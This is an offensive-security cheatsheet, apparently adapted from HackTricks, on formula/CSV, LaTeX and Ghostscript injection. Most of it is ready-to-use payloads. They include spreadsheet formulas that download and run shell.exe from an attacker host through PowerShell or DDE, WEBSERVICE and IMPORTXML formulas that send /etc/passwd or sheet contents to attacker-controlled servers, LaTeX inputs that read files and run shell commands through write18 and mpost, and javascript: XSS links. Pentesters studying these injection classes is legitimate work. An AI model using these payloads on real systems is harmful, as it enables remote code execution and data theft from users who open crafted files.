daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

formula-csv-doc-latex-ghostscript-injection.md (9984B)


      1 ---
      2 title: "Formula/CSV/Doc/LaTeX/GhostScript Injection"
      3 section: "Web Pentesting"
      4 sectionSlug: "pentesting-web"
      5 sourcePath: "src/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Formula/CSV/Doc/LaTeX/GhostScript Injection
     14 
     15 ## Formula Injection
     16 
     17 ### Info
     18 
     19 If your **input** is being **reflected** inside **CSV file**s (or any other file that is probably going to be opened by **Excel**), you maybe able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the excel sheet.
     20 
     21 > [!CAUTION]
     22 > Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload.
     23 
     24 ### [Wordlist](https://github.com/payloadbox/csv-injection-payloads)
     25 
     26 ```text
     27 DDE ("cmd";"/C calc";"!A0")A0
     28 @SUM(1+9)*cmd|' /C calc'!A0
     29 =10+20+cmd|' /C calc'!A0
     30 =cmd|' /C notepad'!'A1'
     31 =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
     32 =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
     33 ```
     34 
     35 ### Hyperlink
     36 
     37 **The following example is very useful to exfiltrate content from the final excel sheet and to perform requests to arbitrary locations. But it requires the use to click on the link (and accept the warning prompts).**
     38 
     39 The following example was taken from [https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit)<sup>[[5]](#references)</sup>
     40 
     41 Imagine a security breach in a Student Record Management system is exploited through a CSV injection attack. The attacker's primary intention is to compromise the system used by teachers to manage student details. The method involves the attacker injecting a malicious payload into the application, specifically by entering harmful formulas into fields meant for student details. The attack unfolds as follows:
     42 
     43 1. **Injection of Malicious Payload:**
     44    - The attacker submits a student detail form but includes a formula commonly used in spreadsheets (e.g., `=HYPERLINK("<malicious_link>","Click here")`).
     45    - This formula is designed to create a hyperlink, but it points to a malicious server controlled by the attacker.
     46 2. **Exporting Compromised Data:**
     47    - Teachers, unaware of the compromise, use the application's functionality to export the data into a CSV file.
     48    - The CSV file, when opened, still contains the malicious payload. This payload appears as a clickable hyperlink in the spreadsheet.
     49 3. **Triggering the Attack:**
     50    - A teacher clicks on the hyperlink, believing it to be a legitimate part of the student's details.
     51    - Upon clicking, sensitive data (potentially including details from the spreadsheet or the teacher's computer) is transmitted to the attacker's server.
     52 4. **Logging the Data:**
     53    - The attacker's server receives and logs the sensitive data sent from the teacher's computer.
     54    - The attacker can then use this data for various malicious purposes, further compromising the privacy and security of the students and the institution.
     55 
     56 ### RCE
     57 
     58 **Check the** [**original post**](https://notsosecure.com/data-exfiltration-formula-injection-part1) **for further details.**<sup>[[1]](#references)</sup>
     59 
     60 In specific configurations or older versions of Excel, a feature called Dynamic Data Exchange (DDE) can be exploited for executing arbitrary commands. To leverage this, the following settings must be enabled:
     61 
     62 - Navigate to File → Options → Trust Center → Trust Center Settings → External Content, and enable **Dynamic Data Exchange Server Launch**.
     63 
     64 When a spreadsheet with the malicious payload is opened (and if the user accepts the warnings), the payload is executed. For example, to launch the calculator application, the payload would be:
     65 
     66 ```markdown
     67 =cmd|' /C calc'!xxx
     68 ```
     69 
     70 Additional commands can also be executed, such as downloading and executing a file using PowerShell:
     71 
     72 ```bash
     73 =cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
     74 ```
     75 
     76 ### Local File Inclusion (LFI) in LibreOffice Calc
     77 
     78 LibreOffice Calc can be used to read local files and exfiltrate data. Here are some methods:
     79 
     80 - Reading the first line from the local `/etc/passwd` file: `='file:///etc/passwd'#$passwd.A1`
     81 - Exfiltrating the read data to an attacker-controlled server: `=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)))`
     82 - Exfiltrating more than one line: `=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
     83 - DNS exfiltration (sending read data as DNS queries to an attacker-controlled DNS server): `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<attacker domain>"))`
     84 
     85 ### Google Sheets for Out-of-Band (OOB) Data Exfiltration
     86 
     87 Google Sheets offers functions that can be exploited for OOB data exfiltration:
     88 
     89 - **CONCATENATE**: Appends strings together - `=CONCATENATE(A2:E2)`
     90 - **IMPORTXML**: Imports data from structured data types - `=IMPORTXML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")`
     91 - **IMPORTFEED**: Imports RSS or ATOM feeds - `=IMPORTFEED(CONCAT("http://<attacker IP:Port>//123.txt?v=", CONCATENATE(A2:E2)))`
     92 - **IMPORTHTML**: Imports data from HTML tables or lists - `=IMPORTHTML (CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)`
     93 - **IMPORTRANGE**: Imports a range of cells from another spreadsheet - `=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")`
     94 - **IMAGE**: Inserts an image into a cell - `=IMAGE("https://<attacker IP:Port>/images/srpr/logo3w.png")`
     95 
     96 ## LaTeX Injection
     97 
     98 Usually the servers that will find on the internet that **convert LaTeX code to PDF** use **`pdflatex`**.\
     99 This program uses 3 main attributes to (dis)allow command execution:
    100 
    101 - **`--no-shell-escape`**: **Disable** the `\write18{command}` construct, even if it is enabled in the texmf.cnf file.
    102 - **`--shell-restricted`**: Same as `--shell-escape`, but **limited** to a 'safe' set of **predefined** **commands (**On Ubuntu 16.04 the list is in `/usr/share/texmf/web2c/texmf.cnf`).
    103 - **`--shell-escape`**: **Enable** the `\write18{command}` construct. The command can be any shell command. This construct is normally disallowed for security reasons.
    104 
    105 However, there are other ways to execute commands, so to avoid RCE it's very important to use `--shell-restricted`.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup>
    106 
    107 ### Read file <a href="#read-file" id="read-file"></a>
    108 
    109 You might need to adjust injection with wrappers as \[ or $.
    110 
    111 ```bash
    112 \input{/etc/passwd}
    113 \include{password} # load .tex file
    114 \lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
    115 \usepackage{verbatim}
    116 \verbatiminput{/etc/passwd}
    117 ```
    118 
    119 #### Read single lined file
    120 
    121 ```bash
    122 \newread\file
    123 \openin\file=/etc/issue
    124 \read\file to\line
    125 \text{\line}
    126 \closein\file
    127 ```
    128 
    129 #### Read multiple lined file
    130 
    131 ```bash
    132 \newread\file
    133 \openin\file=/etc/passwd
    134 \loop\unless\ifeof\file
    135     \read\file to\fileline
    136     \text{\fileline}
    137 \repeat
    138 \closein\file
    139 ```
    140 
    141 ### Write file <a href="#write-file" id="write-file"></a>
    142 
    143 ```bash
    144 \newwrite\outfile
    145 \openout\outfile=cmd.tex
    146 \write\outfile{Hello-world}
    147 \closeout\outfile
    148 ```
    149 
    150 ### Command execution <a href="#command-execution" id="command-execution"></a>
    151 
    152 The input of the command will be redirected to stdin, use a temp file to get it.
    153 
    154 ```bash
    155 \immediate\write18{env > output}
    156 \input{output}
    157 
    158 \input{|"/bin/hostname"}
    159 \input{|"extractbb /etc/passwd > /tmp/b.tex"}
    160 
    161 # allowed mpost command RCE
    162 \documentclass{article}\begin{document}
    163 \immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
    164 \end{document}
    165 
    166 # If mpost is not allowed there are other commands you might be able to execute
    167 ## Just get the version
    168 \input{|"bibtex8 --version > /tmp/b.tex"}
    169 ## Search the file pdfetex.ini
    170 \input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
    171 ## Get env var value
    172 \input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
    173 ## Get the value of shell_escape_commands without needing to read pdfetex.ini
    174 \input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
    175 ```
    176 
    177 If you get any LaTex error, consider using base64 to get the result without bad characters
    178 
    179 ```bash
    180 \immediate\write18{env | base64 > test.tex}
    181 \input{text.tex}
    182 ```
    183 
    184 ```bash
    185 \input|ls|base4
    186 \input{|"/bin/hostname"}
    187 ```
    188 
    189 ### Cross Site Scripting <a href="#cross-site-scripting" id="cross-site-scripting"></a>
    190 
    191 From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)<sup>[[7]](#references)</sup>
    192 
    193 ```bash
    194 \url{javascript:alert(1)}
    195 \href{javascript:alert(1)}{placeholder}
    196 ```
    197 
    198 ## Ghostscript Injection
    199 
    200 **Check** [**https://blog.redteam-pentesting.de/2023/ghostscript-overview/**](https://blog.redteam-pentesting.de/2023/ghostscript-overview/)<sup>[[6]](#references)</sup>
    201 
    202 ## References
    203 
    204 - [1] [Data Exfiltration via Formula Injection #Part1](https://notsosecure.com/data-exfiltration-formula-injection-part1)
    205 - [2] [Hacking with LaTeX](https://0day.work/hacking-with-latex/)
    206 - [3] [LaTeX Injection Cheatsheet](https://salmonsec.com/cheatsheet/latex_injection)
    207 - [4] [Pwning coworkers thanks to LaTeX](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
    208 - [5] [CSV Injection: Basic to Exploit](https://payatu.com/csv-injection-basic-to-exploit)
    209 - [6] [Ghostscript overview](https://blog.redteam-pentesting.de/2023/ghostscript-overview/)
    210 - [7] [LaTeX XSS payloads (@EdOverflow)](https://twitter.com/intigriti/status/1101509684614320130)